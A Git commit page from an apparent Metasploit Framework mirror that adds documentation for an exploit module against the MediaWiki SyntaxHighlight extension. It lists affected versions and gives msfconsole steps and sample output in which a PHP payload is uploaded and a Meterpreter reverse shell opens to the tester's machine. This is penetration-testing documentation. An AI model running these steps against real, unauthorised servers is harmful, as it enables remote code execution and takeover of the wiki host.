infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added docs for mediawiki_syntaxhighlight.rb

bug/bundler_fix
Yorick Koster 2017-04-29 16:14:25 +02:00 committed by GitHub
parent f9e7715adb
commit 0eb79e8c8c
1 changed files with 30 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md Normal file
View File

@ -0,0 +1,30 @@
## Vulnerable Application
Any MediaWiki installation with SyntaxHighlight version 2.0 installed & enabled. This extension ships with the AIO package of MediaWiki 1.27.x & 1.28.x. This issue was supposed to be fixed in MediaWiki version 1.28.1 and version 1.27.2. It appears that the fix was pushed to the git repository, but for some reason it was not included in the release packages.
## Verification Steps
1. `use exploit/multi/http/mediawiki_syntaxhighlight`
2. `set RHOST <ip target site>`
3. `set TARGETURI <MediaWiki path>`
4. `set UPLOADPATH <writable path in web root>`
5. optionally set `RPORT`, `SSL`, and `VHOST`
6. `exploit`
7. **Verify** a new Meterpreter session is started
## Sample Output
```
msf > use exploit/multi/http/mediawiki_syntaxhighlight
msf exploit(mediawiki_syntaxhighlight) > set RHOST 192.168.146.137
RHOST => 192.168.146.137
msf exploit(mediawiki_syntaxhighlight) > set TARGETURI /mediawiki
TARGETURI => /mediawiki
msf exploit(mediawiki_syntaxhighlight) > exploit
[*] Started reverse TCP handler on 192.168.146.197:4444
[*] Local PHP file: images/bwpqtiqgmeydivskjcjltnldb.php
[*] Trying to run /mediawiki/images/bwpqtiqgmeydivskjcjltnldb.php
[*] Sending stage (33986 bytes) to 192.168.146.137
[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.137:55768) at 2017-04-29 14:27:03 +0200
```